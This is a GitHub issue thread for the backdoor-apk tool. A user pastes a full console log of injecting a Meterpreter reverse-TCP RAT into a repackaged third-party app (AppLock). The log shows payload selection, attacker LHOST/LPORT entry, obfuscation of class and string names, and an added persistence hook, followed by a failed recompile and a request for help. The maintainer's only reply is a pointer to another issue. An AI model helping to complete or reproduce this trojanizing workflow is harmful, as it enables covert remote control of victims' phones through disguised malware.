### ISSUE TITLE
Failed to recompile original project with backdoor

### ISSUE THREAD

**Issue by MircoCagni** [dana-at-cp/backdoor-apk#166]
root@vmi239688:~/Documents/backdoor-apk/backdoor-apk# ./backdoor-apk.sh AppLock_v2.6.8_apkpure.com.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Fri Feb  8 19:44:09 CET 2019
[+] Android payload options:
1) meterpreter/reverse_http   3) meterpreter/reverse_tcp    5) shell/reverse_https
2) meterpreter/reverse_https  4) shell/reverse_http         6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: <server ip>
[?] Please enter an LPORT value: <server port>
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/domobile/applock
[+] Smali file to hook RAT payload: com/domobile/applock/AppLockApplication.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[+] Keeping permissions of original project
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/domobile/applock/zrwjy
[+] Generated new smali class name for MainBroadcastReceiver.smali: Qrndi
[+] Generated new smali class name for MainService.smali: Ghppp
[+] Generated new smali class name for Payload.smali: Ixkrn
[+] Generated new smali class name for StringObfuscator.smali: Etquf
[+] Generated new smali method name for StringObfuscator.obfuscate method: eogow
[+] Generated new smali method name for StringObfuscator.unobfuscate method: fjdhn
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

How can i solve it? I had already try all suggestion

**Comment by dana-at-cp** [comment]
#168
